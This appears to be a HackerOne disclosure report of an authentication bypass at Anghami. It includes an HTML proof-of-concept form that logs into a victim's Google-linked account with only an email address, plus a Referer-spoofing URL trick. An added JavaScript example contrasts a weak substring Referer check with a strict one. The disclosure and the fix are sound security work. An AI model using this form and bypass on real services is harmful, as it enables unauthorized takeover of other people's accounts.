Anghami: [CRITICAL] Login To Any Account Linked With Google+ With Email Only

2015-09-01T15:08:44
ID H1:86504
Type hackerone
Reporter ibram
Modified 2015-10-02T23:54:35

Description

Hello, This is CRITICAL .. I Can Login To Any Account Linked With Google+ With Email Only And Without Password!!

PoC:

```html
<form action="https://api.anghami.com/gateway.php" method="POST">
  <input type="hidden" name="m" value="gop">
  <input type="hidden" name="u" value="victim@email.com"> <!-- Victim's Email -->
  <input type="hidden" name="p" value="">
  <input type="hidden" name="type" value="authenticate">
  <input type="hidden" name="lang" value="en">
  <input type="hidden" name="language" value="en">

  <input type="submit">
</form>
```

And To Make This PoC Work .. You Have To Follow The Same Bypass in My Previous Report [#86428](https://hackerone.com/reports/86428). If Your Page URL is `http://localhost/login.html` Make It Look Like `http://localhost/login.html?https://play.anghami.com/login`. Submit The Form .. And You'll Be In The Victim Account.

Please Let Me Know If You Need a Video To Help You Reproduce This Vulnerability.

Best Regards, Ebram Marzouk
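
Added example, not part of the report and not Anghami's code: the URL trick above would pass a Referer check that only looks for the allowed login URL somewhere in the header. The report does not show the server code, so the weak check here is an assumption, set beside an exact origin and path comparison. All function and constant names are hypothetical, and the sample headers are constructed.

```javascript
// Assumed allowed page, taken from the login URL quoted in the report.
const ALLOWED_ORIGIN = "https://play.anghami.com";
const ALLOWED_PATH = "/login";

// Weak form (assumed): accepts any Referer that merely CONTAINS the allowed URL,
// so the URL can sit in the query string of an unrelated page.
function refererAllowedWeak(referer) {
  return typeof referer === "string" &&
    referer.includes(ALLOWED_ORIGIN + ALLOWED_PATH);
}

// Strict form: parse the header, then compare scheme+host+port and path exactly.
function refererAllowedStrict(referer) {
  if (typeof referer !== "string") return false;
  let url;
  try {
    url = new URL(referer);
  } catch {
    return false; // missing or unparseable header fails closed
  }
  return url.origin === ALLOWED_ORIGIN && url.pathname === ALLOWED_PATH;
}

// Note: a Referer check only restricts which page submitted the form.
// It does not prove who the user is, so it cannot stand in for verifying
// the credential (password or provider-issued token) on the server.

// Constructed sample Referer headers.
const samples = [
  "https://play.anghami.com/login",
  "http://localhost/login.html?https://play.anghami.com/login",
  "https://play.anghami.com.example.net/login",
  "",
];

// Run both checks over a list of headers and return the verdicts.
function evaluate(headers) {
  return headers.map((h) => ({
    referer: h,
    weak: refererAllowedWeak(h),
    strict: refererAllowedStrict(h),
  }));
}

console.table(evaluate(samples));
```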